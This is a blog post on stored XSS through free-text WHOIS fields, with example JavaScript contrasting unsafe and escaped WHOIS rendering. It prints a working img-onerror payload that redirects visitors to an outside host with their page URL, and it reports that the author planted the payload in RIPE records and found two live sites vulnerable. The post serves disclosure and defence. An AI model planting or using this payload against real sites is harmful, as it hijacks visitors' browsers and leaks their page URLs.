I am very interested in WHOIS, so I had to wonder whether some of the online WHOIS clients were open to XSS.

So what I did was add some JavaScript to the WHOIS objects of an IPv6 block (2a0d:1a45:6663::/48) and an IPv4 address. I simply added

<img src=1 href=1 onerror="javascript:window.location='https://cynthia.re/pages/whois-xss/'+window.location">

to the objects in the RIPE database. I used an img element with an onerror handler rather than a straight-up script tag to get past the most basic XSS filters (it also has the advantage that it fires when the markup is inserted via innerHTML, where an injected script element would not execute).

And surprise, surprise: within a few minutes I found 2 sites that were exploitable. I will mention that there was probably not much of value on those pages otherwise.

But my main point with this experiment was to look at the alternative “inputs”. Most decent websites do filter user input; what they might not filter, however, is data they fetch from somewhere else and render as if it were trusted.

WHOIS is one example of such data. While this is not true for domain WHOIS (as far as I am aware, excluding registrars’ own whois servers), for ASNs and IPv4/IPv6 address space all 5 RIRs (Regional Internet Registries) allow people to place custom free-form text in the WHOIS objects, so whoever holds a resource controls what every WHOIS front-end will display for it.
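To make this concrete, the following is an added example, not code from the original post or from any of the sites mentioned: a minimal WHOIS front-end written in Node-style JavaScript, first in the vulnerable shape (the RIR response is dropped straight into HTML) and then hardened (every fetched value is HTML-escaped before it touches the page). The WHOIS response it parses is constructed for the example; it imitates a trimmed RIPE inet6num object and carries the payload from above in its descr field. The field names and helper functions are assumptions for illustration only.

```javascript
// Constructed sample of what a WHOIS front-end might get back from the RIR.
// The descr: field is attacker-controlled free text, here the post's payload.
const SAMPLE_WHOIS = `inet6num:       2a0d:1a45:6663::/48
netname:        EXAMPLE-NET
descr:          <img src=1 href=1 onerror="javascript:window.location='https://cynthia.re/pages/whois-xss/'+window.location">
country:        NL
status:         ASSIGNED
source:         RIPE`;

// Parse "key: value" lines into [key, value] pairs. RIPE objects may wrap a
// value onto continuation lines that begin with whitespace; those are
// appended to the previous field.
function parseWhois(text) {
  const fields = [];
  for (const line of text.split('\n')) {
    const m = line.match(/^([A-Za-z0-9-]+):\s*(.*)$/);
    if (m) {
      fields.push([m[1], m[2]]);
    } else if (/^\s+\S/.test(line) && fields.length > 0) {
      fields[fields.length - 1][1] += ' ' + line.trim();
    }
  }
  return fields;
}

// Vulnerable: the visitor's own query (the IP or ASN they typed) may well be
// validated, but the text that comes back from the RIR is trusted and
// concatenated into markup, so the onerror handler ends up live in the page.
function renderWhoisUnsafe(text) {
  return '<dl>' +
    parseWhois(text).map(([k, v]) => `<dt>${k}</dt><dd>${v}</dd>`).join('') +
    '</dl>';
}

// Minimal HTML escaping for text nodes and quoted attribute values.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened: fetched data is treated exactly like user input and escaped
// before insertion. In a real browser page the equivalent is assigning the
// value with textContent instead of innerHTML.
function renderWhoisSafe(text) {
  return '<dl>' +
    parseWhois(text)
      .map(([k, v]) => `<dt>${escapeHtml(k)}</dt><dd>${escapeHtml(v)}</dd>`)
      .join('') +
    '</dl>';
}

// Crude check a tester can run over a rendered page: is there any element
// whose attributes include an on* event handler? Escaped data never forms
// a tag, so the hardened output does not trip this.
function containsLiveHandler(html) {
  return /<[^>]+\son[a-z]+\s*=/i.test(html);
}

console.log('unsafe has live handler:', containsLiveHandler(renderWhoisUnsafe(SAMPLE_WHOIS)));
console.log('safe has live handler:  ', containsLiveHandler(renderWhoisSafe(SAMPLE_WHOIS)));
```

The same applies to any other field that a front-end might render, including ones that look harmless such as remarks, address or org-name; the fix is to escape (or assign via textContent) everything that came over the wire, not to try to spot payloads in individual fields.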

If you find any pages that are vulnerable, please do contact the owners of that site and/or, if you wish, contact me via email or on Twitter.